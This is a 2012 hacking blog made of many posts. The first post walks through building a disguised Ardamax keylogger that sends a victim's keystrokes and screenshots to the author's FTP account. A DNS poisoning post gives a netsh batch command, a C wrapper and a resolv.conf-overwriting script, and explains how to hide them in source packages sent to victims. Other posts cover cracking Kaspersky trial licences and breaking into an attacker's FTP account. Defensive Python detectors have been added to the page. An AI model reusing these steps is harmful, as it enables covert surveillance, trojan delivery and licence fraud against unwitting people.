Friday 24 February 2012

How to remotely install Ardamax Keylogger

1. check task bar
2. click on keylogger
3.tick the given option press next 


 4. After this press Enable and then give a password for better security of the remote keylogger. Press next also See screen shot  above in the photo

5. now uncheck update option and hit next.

6. Now after pressing next in last step, choose the options as I did in scree shot below, you can also enable self destruct of keylogger at specific date, after that date the keylogger will be no more in the victim system to send you logs, how ever to keep that forever in that pc, till that victim’s computer is not formatted disable as I did and hit next as u see above.

7.You can choose the way of delivery of logs to you, it can be email as well as ftp. You can choose ftp as it will be better, email can also be used, as keylogger will then email you logs and in ftp it will upload logs to remote server. For better email experience always use Gmail for using as email in remote keylogger as it will not block emails from ardamax keylogger, here I will use ftp and then press next. Before pressing next Here you can specify time also that after how much time interval the logs of victim computer should be sent to you c above 
8.   You will need a free ftp account here, You can make one at t35.com and they will tell you your ftp information in the end after you have created your account, following information will be given
  • Ftp Host:- ftp.t35.com
  • Username:- yourusername.t35.com
  • Password:- chose ur own
  • Port:- 21

So, put this information 
You can test too, and a test file will be uploaded to your remote ftp server. Press next

 Enable all the options given and tick them.Like I did and press next


                                   10. After that setup the screen shot quality in next step, I leave this one you that how much quality screen shot of victim screen you need. Press next again.
11. Now you have to give ardamax remote keylogger utility the path where you want that remote keylogger exe should be created in your computer, so that you may send it later to victim. I have given this path:
C:\Program Files\POL\Install.exe and I have chosen installation package icon to fool the victim so that he may think it a software. Then hit next and hit finish and then go to :- C:\Program Files\POL\Install.exe here you will see that Install.exe is created now just copy it and send it to victim by email or any other mean, I’ll discuss all such means in my next post. See screen                        
 12.  So you are done just spread it and you will start receiving logs inyourusername.t35.com point your browser here to watch all logs or else use Filezilla to download all logs.
enjoy :)



Sunday 19 February 2012

How to Update Facebook Status In Blue Color

Copy and paste the code below into the status bar in Facebook: @@[0:[100000569539945:0: YOUR TEXT HERE ]] Then click on Share.

njoyy

God Modes....

Windows 7 GodModes …
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C} 


For separate Control Panel items:
GodMode1.{00C6D95F-329C-409a-81D7-C46C66EA7F33}
GodMode2.{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}
GodMode3.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}
GodMode4.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}
GodMode5.{1206F5F1-0569-412C-8FEC-3204630DFB70}
GodMode6.{15eae92e-f17a-4431-9f28-805e482dafd4}
GodMode7.{17cd9488-1228-4b2f-88ce-4298e93e0966}
GodMode8.{1D2680C9-0E2A-469d-B787-065558BC7D43}
GodMode9.{1FA9085F-25A2-489B-85D4-86326EEDCD87}
GodMode10.{208D2C60-3AEA-1069-A2D7-08002B30309D}
GodMode11.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
GodMode12.{2227A280-3AEA-1069-A2DE-08002B30309D}
GodMode13.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}
GodMode14.{4026492F-2F69-46B8-B9BF-5654FC07E423}
GodMode15.{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}
GodMode16.{78F3955E-3B90-4184-BD14-5397C15F1EFC}

How to crack Kaspersky Antivirus manually

 :A. At first, Delete any old key (if there is a key in kaspersky)

B. Now, Disable Self Defense (Go to Settings, In Option, Turn off Self Defense and Click Ok )

C. Now, Goto Start menu, Click Run and Type "regedit". Go to :

HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\protected\AVP9\environment(For 32bit OS: - windows xp or vista or windows 7)

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\protected\AVP9\environment(For 64bit OS: - windows xp or vista or windows 7)

D. Now, Right look for PCID and right click and modify three or four last numbers or letters, a example is : (8F10C22F-6EF6-4378-BAB1-34722F6D454)and enter any other three-letter, four-number and close Registry Editor Now.

E. Go to Taskbar and Right Click the kaspersky Icon and click Exit.

F. Go to start programs and open kaspersky. when you activate searching trial license and you have a new license key for month.

G. Go to kaspersky settings and Enable (turn on) Self Defense.

After 30 days, when your license expire, go to step 1 to 7 and get a new 30 days license from kaspersky server automatically.

this is a tricks what is done a few minutes and give you a new trial license. so it is better to find a license key.

Copy Text From Scanned Document /image

So, here starts the trick. All you have to do is use Microsoft OneNote. This software is bundled with the Microsoft Office package, so you needn't buy any extra software for it. All you have to do is:
  • Open Microsoft OneNote.
  • Copy the image from which you want to extract text.
  • Paste it into Microsoft OneNote.
  • Right click on the image.
  • Choose the option “Copy text from image” from the shown options.

Tadaa :) You have got all the text, now save it! Thanks for reading. Comment if you like it or if you have any problem :)

Using Android phone as a touchpad to a Computer

What you need -

A working WiFi on computer with internet connection

There are two ways to do this

a) Your mobile's internet

b) Your PC's internet (with WiFi)


Method : Your mobile's internet


Tutorial -

1) Turn on your Mobile's WiFi hotspot.

2) Connect your PC to your mobile's hotspot.

3) Download and install RemoteDroid from here - http://www.mediafire.com/?htsq77opld2e21y

4) Download PC server file from here - http://www.mediafire.com/?oayzq3kyk3lkn1w

(PC server files only work if Java is installed; if Java is not there, get it here - http://www.java.com/en/download/manual.jsp)

5) Open the 'RemoteDroidServer.bat' from PC

6) It will open and show the Server IP, note it down.

7) Open RemoteDroid on your mobile.

8) Enter the IP given in the 'RemoteDroidServer'.

You will have a touchpad and 2 buttons; they are for distant usage.

Wednesday 8 February 2012

Hack A Hacker Using Sniffer

Hackers usually use software like RATs and keystroke loggers to steal a victim's password. To get the victim's logs while being offline, the attacker uses an FTP server, and if you have read my previous tutorials on sniffing then you might already know that the FTP protocol is susceptible to sniffing. Using this weakness of the protocol you can hack a hacker with a sniffer.
So if you somehow feel that you have been hacked using a RAT, then get a sniffing tool like Wireshark (my favorite) or Cain and Abel. Both are really powerful tools to analyze and retrieve information from packets.
So install a sniffer and start analyzing the packets that are leaving your system. After analyzing the packets you will get the user-name and password of the attacker's FTP server. Use that information to log in to his/her FTP account, do whatever you want and take revenge for planting a RAT in your system. Like this you'll hack a hacker and tell him/her that this time he/she has messed with the wrong guy.
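Added example (not from the original post): a defender-side triage of the capture described above. It lists FTP control sessions that leave a workstation for an external server, which is how an FTP-reporting keylogger or RAT shows up on the wire, and records that a password crossed in cleartext without storing it. The tuple layout, the internal network range and every sample value are constructed assumptions.

```python
import ipaddress

# Constructed sample: client-to-server lines from FTP control connections,
# as (source IP, destination IP, destination port, payload) tuples exported
# from a capture taken on the suspect workstation.
SAMPLE_CAPTURE = [
    ("192.168.1.23", "203.0.113.50", 21, "USER logdrop\r\n"),
    ("192.168.1.23", "203.0.113.50", 21, "PASS s3cret-example\r\n"),
    ("192.168.1.23", "203.0.113.50", 21, "TYPE I\r\n"),
    ("192.168.1.23", "203.0.113.50", 21, "STOR keys_2012-02-08.htm\r\n"),
    ("192.168.1.23", "192.168.1.5", 21, "USER backup\r\n"),      # internal server
    ("192.168.1.23", "198.51.100.7", 80, "GET / HTTP/1.1\r\n"),  # not FTP
]


def find_outbound_ftp_sessions(records, internal_net="192.168.1.0/24"):
    """Summarise FTP logins that go from the internal network to outside hosts.

    Only the default control port (21) is inspected; FTP on another port
    would need protocol detection in the capture tool instead.
    """
    net = ipaddress.ip_network(internal_net)
    sessions = {}
    for src, dst, dport, payload in records:
        if dport != 21:
            continue
        if ipaddress.ip_address(src) not in net:
            continue  # not one of our hosts
        if ipaddress.ip_address(dst) in net:
            continue  # internal file server, out of scope here
        verb, _, arg = payload.strip().partition(" ")
        verb = verb.upper()
        if verb not in ("USER", "PASS", "STOR"):
            continue
        entry = sessions.setdefault((src, dst), {
            "client": src,
            "server": dst,
            "user": None,
            "password_in_clear": False,
            "uploads": [],
        })
        if verb == "USER":
            entry["user"] = arg
        elif verb == "PASS":
            # Record the exposure only; the secret itself is never kept.
            entry["password_in_clear"] = True
        else:
            entry["uploads"].append(arg)
    return list(sessions.values())


if __name__ == "__main__":
    for session in find_outbound_ftp_sessions(SAMPLE_CAPTURE):
        print(session)
```

The server address and uploaded file names are the indicators to hand to incident response or the hosting provider's abuse desk.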

Your Safety Over LAN Is Compromised

You might be surprised by the title of this post, that safety over LAN is compromised. The fact I am revealing here is more surprising than the title itself. If you work for a company with a high reputation for its quality of service and security over the network, and you feel the LAN you use for communication is safe, then sorry, you are mistaken. No LAN connection in the world is safe enough to protect your privacy. The reason is not hackers using sniffing tools to collect information from the network; the network itself is the problem, since it can be monitored. Network monitoring tools, IDS and firewalls can all sniff packets from the network, and the worst part is that they all work from the desk of the system administrator, i.e. from the main station that provides LAN connectivity to all computers.

It means that before any information leaves the company's network it passes the desk of the system administrator to get monitored, so if he/she installs a sniffer along with a network monitoring tool then he/she will be able to sniff all connections available over the network. That means if he/she is a real bad ass buddy then no information leaving or coming to your computer is safe.

If you have been in the field of security for a long time you might know the name Moxie Marlinspike well. He is an independent security researcher who found a vulnerability and developed sslstrip to hack information over HTTPS connections. That means even an HTTPS proxy over LAN can be overpowered to get sensitive information; it can only bypass the firewall but not packet monitoring and the brain of a human being. Since all mailing protocols, IRC protocols, streaming protocols, file transfer protocols and even remote login protocols are vulnerable to sniffing, a person sitting at the administrator's system can surely steal it.

He/she can use tools like Wireshark, Ettercap, Session Capture, Omni Peek, IRS, IRIS, WinSniffer and Ace Password Sniffer to do his/her dirty job, since they are all awesome packet capturing tools. IRIS and Ace Password Sniffer have an extra advantage over plain password sniffing: IRIS can also reconstruct packets to reveal information as it is displayed on the victim's computer, so no technical power is required to get the information, and Ace Password Sniffer will display the username and password as they are, as soon as someone uses them to log in over a vulnerable protocol.

What can be countermeasures ?
You can never guarantee your system admin is a nice guy, so it's your job to protect yourself.
Never do any kind of transactional communication over LAN. A transactional communication means communication that requires authentication, in e-commerce terms.
And if it is important, use a tunneled connection with the IPSec protocol, i.e. use a VPN service, or set up an HTTP tunnel using tunneling software from your LAN to some secure computer at your home or neighborhood.
You can also opt for onion routing by using TOR, but I am doubtful about it since I have never captured a packet from an onion routing network.

I hope you enjoyed reading above information. Thanks for reading and keep visiting.

DNS Poisoning

Before we proceed to DNS Poisoning let's have a look at the basics. So let's first take a look at what DNS is. You already know the internet runs on the TCP/IP model, or you can say the internet protocol stack. The TCP/IP stack specifies and uses IP addresses (example: 204.87.98.34) to route data between source and destination computers. Every computer in the world that is connected to a network has an IP address. Since remembering IP addresses is difficult, each IP address is associated with a name like www.google.com, which is also known as a domain name. Domain names are easy to remember, but the original TCP/IP stack needs an IP address for communication, not the domain name. So a service has been created to convert these domain names into their respective IP addresses. This service is known as Domain Name Service (DNS), and a computer or system which provides this service is known as Domain Name System. Now you can call it a coincidence that Domain Name Service and Domain Name System both end up having the same abbreviation, DNS, and the best part is they don't even conflict with each other in use.

A DNS runs on the DNS protocol, which translates a web address into its respective IP address. DNS poisoning or DNS spoofing is a technique by which an attacker provides a wrong IP address to a DNS server to misdirect users to fake websites. The following are the types of DNS poisoning; future posts will cover them briefly:
  • Intranet DNS Spoofing/Poisoning
  • Internet DNS Spoofing/Poisoning
  • Proxy Server DNS Spoofing/Poisoning
  • DNS Cache Spoofing/Poisoning
Intranet DNS poisoning is done over a LAN. It is usually performed over a switched network with the help of ARP poisoning. You can use Cain And Abel to perform this kind of attack. Internet DNS poisoning can be done over any system across the world by changing the DNS entries of the victim's computer. In Proxy Server DNS poisoning we change the proxy settings of the victim to our IP address and then redirect the victim to a fake website. In DNS cache poisoning an attacker changes the IP address entries of the target website on some specific DNS server; then if any person asks that DNS for information it'll provide fake IP information.

DNS Poisoning Tutorial 3 | Proxy Server DNS Poisoning

For this type of DNS poisoning method an attacker sets up a proxy server on his/her system. Then he/she sets up a rogue DNS and keeps its IP address as the primary DNS entry on the proxy server system. Now he/she has to convince the victim to use the proxy server set up by him/her. Since the proxy server has a rogue DNS as its primary DNS, all requests will pass through it. Since all traffic passes through your system as the proxy server, you can sniff all traffic between the victim and the site he/she communicates with and also perform a DNS poisoning attack.

DNS Poisoning Tutorial - 2 | Internet DNS Poisoning

Following is our second tutorial on DNS Poisoning which is Internet DNS Poisoning, also known as Remote DNS Poisoning. This type of DNS poisoning can be done over a single or multiple victims and no matter where your victim is in world, the primary DNS entries of his/her system can be poisoned using this method. For this type of DNS poisoning attack you'll have to setup a rouge DNS server somewhere with static IP address and please note that it should be in working condition. Methods of poisoning are different for Windows and Linux systems but happens with help of same entity that is Trojan file.
Here I 'll show you how to create DNS poisoning Trojans all you have to do is vector them.

For Windows:
For poisoning DNS of victim you must know name of his/her interface or name he/she has set for his/her internet connection. This condition is must for you to poison victim's DNS if you don't know their values then use default “Local Area Connection”. Now lets create a DNS spoofing Trojan Batch file. Type following lines in notepad and save it with any name and .bat extension.

netsh interface ip set dns “Local Area Connection” static 115.98.23.45

Above command will set DNS server of victim to 115.98.23.45 , you can change “Local Area Connection” by name of interface or connection if you know it, else always go with default. Now send that file to victim for poisoning his/her DNS entries. If you don't want to send bat file because your victim might suspect it, then you can create an executable file by compiling following C program.

#include<stdio.h>
#include<stdlib.h>

int main()
{
char *str= “netsh interface ip set dns “Local Area Connection” static 115.98.23.45”;
system(str);
return 0 ;
}



For Linux And UNIX:
Linux and UNIX systems save DNS entries in /etc/resolv.conf folder by changing entries in this file can help you poison DNS in Linux and UNIX systems. Now get IP address of working DNS server and IP address of rouge DNS server set by you. Suppose IP address of rouge DNS is 115.98.23.45 and real DNS server is 117.98.23.48. Then type following commands in a text file and save with .sh extension(for example change.sh ).

echo “nameserver 115.98.23.45” > /etc/resolv.conf
echo “nameserver 117.98.23.48” >> /etc/resolv.conf

Now all you have to do is vector this file to victim. For vectoring it get any source code installation package from internet of an interesting software your victim can't deny to install in his/her system. Extract it and find a shell script in it, place change.sh in that folder, open target shell script in text editor and before it ends type following commands,

chmod +x change.sh
./change.sh

Pack it again and send to your victim for installation once he/she installs software from your source code he/she will be infected. Now sometimes its difficult to find a shell script in package but what is not difficult to find is a C source file. So if you get problem with above method, find a C source file with several functions in it and create following new function in it.

void change12345()
{
char *str;
str= “echo “nameserver 115.98.23.45” > /etc/resolv.conf”;
system(str);
str= “echo “nameserver 117.98.23.48” >> /etc/resolv.conf”;
system(str);
return;
}

And call this function in any other function before it returns something. Pack files again and send it to your victim, your file will execute every time when your victim will launch that program.

Now note that above exploits codes are really very basic, you can modify them according to your needs and if you think they are difficult to understand please get your hands on programming, even if you can understand basic programming you can write your own exploit codes. Please read books section to have a look on which books I recommend you to begin with programming.
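Added example (not from the original post): the defender's check for the Linux case above. It audits resolv.conf contents against an approved resolver list, so a rogue nameserver written ahead of the legitimate one stands out. The sample text reuses the two addresses from the post; the approved list and the function names are assumptions.

```python
import ipaddress

MAXNS = 3  # glibc's resolver consults at most the first three nameserver lines

# Constructed sample: the file contents the change.sh shown above leaves behind.
TAMPERED = "nameserver 115.98.23.45\nnameserver 117.98.23.48\n"


def parse_nameservers(text):
    """Return nameserver values in file order, skipping every other line."""
    servers = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 2 or fields[0] != "nameserver":
            continue  # blanks, comments (# or ;), search/options lines
        servers.append(fields[1])
    return servers


def audit_resolv_conf(text, approved):
    """Classify each nameserver as approved, unapproved, invalid or ignored.

    Position matters: the resolver asks the first entry first, so an
    unapproved address in position 1 sees every lookup the host makes.
    """
    approved_set = {ipaddress.ip_address(a) for a in approved}
    findings = []
    for position, raw in enumerate(parse_nameservers(text), start=1):
        try:
            addr = ipaddress.ip_address(raw)
        except ValueError:
            findings.append((position, raw, "invalid"))
            continue
        if position > MAXNS:
            status = "ignored"      # present in the file but never queried
        elif addr in approved_set:
            status = "approved"
        else:
            status = "unapproved"
        findings.append((position, raw, status))
    return findings


def is_tampered(text, approved):
    """True when any consulted entry is not an approved resolver."""
    return any(status in ("unapproved", "invalid")
               for _, _, status in audit_resolv_conf(text, approved))


if __name__ == "__main__":
    # Assumption: 117.98.23.48 is the organisation's real resolver, as in the post.
    with open("/etc/resolv.conf") as handle:
        for finding in audit_resolv_conf(handle.read(), ["117.98.23.48"]):
            print(finding)
```

Run from a scheduled job or configuration-management check, this catches the overwrite regardless of which installer or script made it.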

DNS Poisoning Tutorial - 1 | Intranet DNS Poisoning


In this post we will discuss our very first method of poisoning DNS, i.e. Intranet DNS poisoning. An Intranet DNS poisoning attack is done over a LAN which has been ARP poisoned. For performing this DNS poisoning attack you'll need at least three computers connected in a LAN for which the same router, switch or computer acts as gateway, and any man-in-the-middle attack tool; for this tutorial I am using Cain And Abel. Make sure your setup matches the following diagram.
Note that this attack works well for switched network, a hub based network will also work but result will not be as effective as switched network. Now Google for Cain And Abel download it and poison ARP table. Now click on APR-DNS from bottom and add a host name to it.
 
For our example I am poisoning entry of www.Yahoo.com. Now specify IP address of website you want to redirect traffic, if you want to redirect traffic for www.yahoo.com to http://nrupentheking.blogspot.com then click on Resolve type http://nrupentheking.blogspot.com in it and IP address field will take IP address of my blog. So now whenever anyone in LAN will try to browse to yahoo will land on my blog. 

Now something important: of all DNS poisoning methods, Intranet DNS poisoning is the easiest and doesn't require any technical skills because you don't have to set up a DNS server, but for all other methods you must know how to set up a DNS server. I will try my best to keep things as easy as I can, but as advice I would recommend you Google a little and get some information about how to set up a DNS server. If I had to perform the above attack then my choice of tool would be Ettercap; I did this tutorial with Cain And Abel just because it's easy to use and we covered ARP poisoning using Cain and not Ettercap.

Cain is easy for someone who is a beginner, so just take this tutorial as a start-up piece; after getting a little understanding of how DNS poisoning is done, try the same with Ettercap. So the easiest DNS poisoning method, i.e. Intranet DNS poisoning, is done; next time we will see the Internet DNS poisoning method. Thanks for reading and keep visiting.
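Added example (not from the original post): because the intranet method depends on an ARP-poisoned LAN, a defender can spot it from any host's neighbour table, where the gateway's IP address ends up sharing a MAC address with another host. The sketch below parses Linux `ip neigh show` output; the sample table, addresses and function names are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample of `ip neigh show` output on a LAN host while the
# gateway entry is being spoofed by the machine at 192.168.1.10.
SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr 00:0c:29:aa:bb:cc REACHABLE
192.168.1.10 dev eth0 lladdr 00:0c:29:aa:bb:cc STALE
192.168.1.20 dev eth0 lladdr 3c:52:82:11:22:33 REACHABLE
192.168.1.30 dev eth0  FAILED
"""


def parse_neighbors(output):
    """Return (ip, device, mac) for every entry that has a resolved MAC."""
    entries = []
    for line in output.splitlines():
        tokens = line.split()
        if "lladdr" not in tokens or "dev" not in tokens:
            continue  # FAILED/INCOMPLETE entries carry no MAC address
        try:
            mac = tokens[tokens.index("lladdr") + 1].lower()
            dev = tokens[tokens.index("dev") + 1]
        except IndexError:
            continue  # truncated line
        entries.append((tokens[0], dev, mac))
    return entries


def find_shared_macs(output):
    """Map (device, mac) to the IPs claiming it, where more than one does."""
    groups = defaultdict(set)
    for ip, dev, mac in parse_neighbors(output):
        groups[(dev, mac)].add(ip)
    return {key: sorted(ips) for key, ips in groups.items() if len(ips) > 1}


def gateway_suspects(output, gateway_ip):
    """IPs that present the same MAC as the gateway on the same interface."""
    suspects = []
    for ips in find_shared_macs(output).values():
        if gateway_ip in ips:
            suspects.extend(ip for ip in ips if ip != gateway_ip)
    return sorted(suspects)


if __name__ == "__main__":
    print(find_shared_macs(SAMPLE_NEIGH))
    print(gateway_suspects(SAMPLE_NEIGH, "192.168.1.1"))
```

A shared MAC is a lead rather than proof, since a router with several addresses or proxy ARP produces the same pattern; confirm against the gateway's known hardware address.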

Hacking A Website

In this post we will discuss a little about hacking a website. A website is hosted on a web server, so if you hack the web server you hack the website. So first of all let's see some basic types of web server vulnerabilities which can lead to a security breach. You must know that a breach in the security of a web server can also provide an attacker a door to the internal network, and hence owning a web server can give an attacker an exponential advantage. Basically there are only three types of web servers available on which the world hosts its web sites.

-Internet Information Server (IIS) by Microsoft
-Apache
-Apache Variants

Following are some web based vulnerabilities which can lead to security breach of a web server.
-Misconfiguration In Web Server Settings. Most people don’t employ professionals while creating and hosting their websites, a non-pro might hardly know anything about web server security and hence he/she may leave all settings to defaults or at most basic level thus giving even skids a full chance to breach it.

-Faulty Programming Practices. One of the most found reasons for web security breach is faulty programming practice while creating web sites. A vulnerably developed code can be found on thousands of website around. To avoid this problem at least one skilled and experienced programmer should be kept in charge to check faulty programming practice.

-Lack Of Security Policy. A security policy should be implemented properly during the web development phase. You might have seen several websites which disallow download without registration, but when a user arrives at the membership page he/she finds a direct link for the download in the source code. Though this seems non-catastrophic, it can also act as a severe threat.

-Vulnerabilities In Web Application. Web application vulnerabilities generally include SQL injection attacks, XSS attacks, RFI, LFI, buffer overflow etc. If you don't know any of the above terms, don't bother; I will cover them in detail in future posts.

In next post we will have our look on some basic IIS based vulnerabilities and how they are exploited.

Browse Anonymously

How can I browse anonymously or stay invisible online? Is this among the questions which bother you about keeping your privacy online? Anonymizers, proxy servers, VPN and VPS are some options that can help you out. All the above services are also offered as paid services, but here we will just have a look at free services.
Anonymizers(anonymity server):
Anonymizers are nothing but proxy servers which act as browsers inside browsers for surfing. Their advantage is that they digest everything from the page you want to visit and hence can not only protect your privacy but can also protect you from online malware. I'll not recommend any specific anonymizer, since firewalls block them someday, so better visit http://www.proxy4free.com/ which updates its list of anonymizers every hour so that you get a working anonymity server. Alternatively you can use a TOR browser which really guarantees 100% anonymity. Download TOR from http://www.torproject.org/.

Proxy Servers:
Proxy servers need some manual settings in your internet configuration. Proxy servers lift the limitation anonymizers have of only being usable in a browser, by making the proxy IP available to every application that needs an internet connection. Visit http://www.proxy-list.org/ for a fresh list of proxies.

Alternatively, you always have the option of using proxy-generating software; the following is a brief list of proxy software with download links, have your pick.



Please don't ask which is best among them; it's hard to say since the working of a proxy depends upon the load on the proxy server and it may vary with time. As my personal preference I use TOR and Ultra Surf when I need proxy-level anonymity. Please don't do transactional-type browsing like e-mail, social networking or financial transactions over proxy servers; it's not safe, and if you still want to, better not use anything other than TOR.

Virtual Private Network:
VPNs are the most trusted way of hiding online, even more secure than proxy servers and anonymity servers. The following is a list of some software that provides free VPN services.
Ultra VPN is one of the most used and most trusted free VPN service of world, if you have problem trusting any other free VPN service better opt this.

The problem from which every VPN suffers is the speed and bandwidth penalty. Also they need registration; only usaip can be used without registering, by using the username and password “demo”. The advantage they have over anonymizers and proxy servers is that you don't have to bother about transactional browsing.

Virtual Private Server:
Virtual Private Servers are provided by companies that adopt the concept of running multiple virtual systems on the same physical system. Though every virtual PC may reside on the same server, each individual's system acts as a completely separate system. These are the most reliable way to stay invisible online but are only offered as a paid service.

I hope I have covered enough so that you can have your pick. Don't forget to tell us about your views and experience using the above tools. Please note that no matter which tool you use you will have to suffer a speed penalty, but sorry, that is the small cost that you have to pay to browse anonymously and stay invisible online.

Using Dynamic IP as Static IP

As we discussed in Basic Lab Setup For Hacker, a hacker needs a static IP, which is really very expensive for a normal person to have. Here we will discuss how we can counter this problem. Please note that this solution is temporary and can never really take the place of a static IP, but for now it will work.

For this we will use DNS redirect service from www.no-ip.com alternatively you can also use www.dyndns.com.

First of all register with www.no-ip.com by clicking on “No-IP Free” on the home page. After you complete the registration form they will send you a confirmation e-mail; once confirmed, you can log in to your account.
 
Now click on “Hosts/Redirect”, then type the host redirect name you want to which Dynamic DNS will redirect traffic after associating your IP. Let other options remain as it is if you don't know what they do.
 
Now create your host name. Now download “Download Client”. After installing DUC client type your e-mail address and password.
 
To check whether it's working or not, open www.whatismyipaddress.com and check your IP address, then ping the host name you created; both will have the same IP address.

Note: Most of you might be thinking what is use of this setup, you'll know its use when we will cover Trojans and Spywares. Also note that there are several free as well as paid Trojan Clients and Spywares. But free tools are prone to get detected by anti-virus program so better opt for paid ones.

Steps Involved In Hacking

As mentioned earlier, an ethical hacker takes the same steps as a malicious hacker. The following are the different steps that are performed during hacking.

1.Reconnaissance:
This step involves gathering potential information about target system. In fact hacker spends 90% of time for this phase only and next 10% time for rest of the steps.

2.Scanning:
During this phase network is scanned for vulnerability.

3.Gaining Access:
This is the step where real hacking takes place. Hacker takes advantage of vulnerability found in scanning phase and penetrates the victim system.

4.Maintaining Access:
After gaining access hacker makes provision to come back by planting root-kit and backdoor.

5.Covering Tracks:
In this phase hacker removes all traces of his/her presence in system by removing log files and event logs.

Skills Required For A Hacker

Following are some must know things for a hacker or you can say requirements of hacker.

Operating System:
As a hacker you must have upper-hand skills in the operating systems Windows, Linux and Unix. Once you master Linux and Unix you'll hardly face a problem getting yourself onto a Mac. As we move further we will cover both of them in short and then slowly move our level to advanced.

Networking:
A hacker must have expertise in the field of networking; even if you don't have it, you must know some basic terms used in networking. Please click on the following links and try to grasp the topics as thoroughly as you can.
The reality is that a hacker should know networking to the best level. Just knowing the above terms is not sufficient, though you'll not encounter that much of a problem while learning. We still recommend buying a book on networking that covers networking down to the pin points. My personal favorite is the book Data Communication And Networking by Behrouz Forouzan if you want to start. Click on the following link to know more, read people's views or if you want to purchase.

Data Communications and Networking (McGraw-Hill Forouzan Networking)


Knowledge About Setting Up And Configuring Servers:
Yes that is necessary for a hacker so when we will move ahead with flow. We will cover configuring IIS 7, Apache, Vertrigo on Windows and Apache on Linux. Both HTTP and FTP servers will be covered.

Programming:
Absolutely no one can deny that all the best hackers in the world have a master hand in programming. The following are must-know programming languages, but you can make things work even if you don't know them. In any case I would recommend you learn programming.
HTML, C, C++, Java, SQL, Python, Perl, PHP and Ruby.
At the most basic level my advice is that you must know HTML, C, SQL, PHP and Ruby.

Tools:
BackTrack is a platform which is specially crafted and designed for penetration testing. Metasploit is a framework that is used to create and experiment with exploits and payloads. Both are a must for a hacker today. Alternatives to BackTrack are Knoppix Security Edition and Matriux; if you master BackTrack you'll easily master both of them. So I will not leave them out of our list, we'll also cover them.

Ethical Hacking | An Introduction

Whenever the term hacker comes up, many people think of a guy sitting inside a room or garage with a bottle of beer and a laptop or desktop, doing wonders at the click of a button. But the reality check is that hacking is not as easy as portrayed in movies and television, and the term hacker doesn't mean a computer criminal.

So here first of all we'll clear all our misconceptions related to words hackers and hacking.

From Where This Word Came:
The word hacking has its history in the late 1960s, the time when computers were nothing but mighty pieces of machinery and a computer just meant a machine that can compute. Electrical and electronics geeks used to optimize circuits to make any system/circuit work faster, better and more reliably. The job they used to do on circuits was known as a hack. With time computer geeks also started finding ways to optimize their systems to work better, so in fact hacking was always nothing but a kind of reverse engineering. With time, in the professional world the word hacker got the meaning of a person who is highly skilled in hardware, software and networking components. Then movies started portraying hackers as doing only dirty work, and hence today the word hacker has a negative face for people. No matter how the word met a dreadful end, a hacker always had all the qualities that were first put forward in its definition, may they be criminal or ethical. Criminal hackers are also known as Crackers.

Types Of Hackers:

White Hats: White hat hackers are good guys who use their hacking skills for defensive purposes. Organizations and industries pay them high salaries to protect their systems and networks from intrusion.

Black Hats: Black hats are actually the bad guys in the field. Their main job is to breach security and make money. They make money by using their hacking skills for offensive purposes.

Grey Hats: Grey hats are hackers who work for offensive and defensive purposes depending on the situation. They are hired by people to intrude into and protect systems.

Hacktivist: A hacktivist is a kind of hacker who thinks hacking can bring about some social change and hacks governments and organizations to show his discomfort over some trivial issues.

Suicide Hackers: Suicide hackers are those who hack for some purpose and even don't bother to suffer long term jail due to their activities. They can be bad as well as good.

Script Kiddie: A script kiddie is a person who boasts breaking system using scripts and codes written by others though he hardly knows what the code does.

Phreak: It is a person who tries to intrude systems for fun or malicious personal activities. Mostly they are children of age 12-15 who don't even know wrong consequences of hacking.

Types Of Hacking:

Local Hacking: This type of hacking is done when a hacker has full access to the system to implant a virus, keylogger or RAT.

Remote Hacking: Remote hacking is done on a remote system using the Internet.

Social Engineering: Social engineering is a kind of interaction skill that a hacker uses to manipulate people into giving out sensitive information. It is a kind of trick done using good verbal and social skills and understanding.

Terminologies Used Under Hacking:

Threat: A threat is an environment or situation that could lead to a potential breach of security. Ethical hackers look for and prioritize threats when performing a security analysis.

An Exploit: An exploit is a piece of software that takes advantage of a bug, glitch, or vulnerability, leading to unauthorized access, privilege escalation, or denial of service on a computer system.

Vulnerability: A vulnerability is the existence of a software flaw, logic design, or implementation error that can lead to an unexpected and undesirable event executing bad or damaging instructions on the system. In easy words, a vulnerability is a weakness in a system.

Payload: A payload is the agent that helps in taking advantage of a vulnerability in remote hacking.

Attack: An attack occurs when a system is compromised based on a vulnerability.

Types Of Attack:

1. Operating System Attack
2. Application Level Attack
3. Shrink Wrap Code Attack
4. Misconfiguration Attack

An operating system attack is an attack on a specific type of OS. Such an attack uses flaws in the programs and services shipped with the OS. An application level attack exploits faulty coding practices followed during a software's development. Shrink wrap code attacks are attacks on unrefined scripts used for making tasks simpler. Last is the misconfiguration attack, a kind of attack on a misconfigured system or a system left with default settings.


Work Of An Ethical Hacker:

The job of an ethical hacker is to use all his skills, and the tools used by malicious hackers, to find vulnerabilities in a system and then secure it against those vulnerabilities.

Conclusion: Finally, what I want to tell you is that nothing happens at the click of a button. A hacker is a highly skilled person in the field of computing who usually has ample knowledge of software, hardware, OS, networking and programming. A hacker, be he criminal or ethical, has immense patience, determination, organization, discipline and persistence. An attacker may spend months planning, analyzing and executing an attack. This shows his level of dedication to achieving whatever goal he/she has set. A person can never become a good hacker unless he has all the above qualities.

Note: From now on we will cover hacking as the mainstream topic of this blog. Real hacking is never done against lamers who hardly know about security; it is done against a person who is as highly skilled as you are. You can never learn hacking until you do some practical work and gain knowledge of the field, so from now on I urge you to perform the practicals that will be posted on this blog on your own system. From here on no tutorial will be written for lamers, so they will go into as much detail as possible, and it may happen that you do not understand something. Rather than keeping mum, I plead with you to ask whenever you encounter a problem or are bothered by a topic. Whenever I post on hacking I'll try to include one theoretical and one practical tutorial; you are requested to read both and grasp the matter completely. Thanks for visiting, and please tell me whether you are clear on all the points discussed or need some explanation of your difficulty.

Best Password Crackers In Hackers Toolkit

Yep, you read it right: the best password cracker tools in a hacker's toolkit. Following is a list of some well-known and powerful password cracking tools that nearly every hacker has in his/her toolkit. Since they are the best, sooner or later we will cover all of them on this blog.
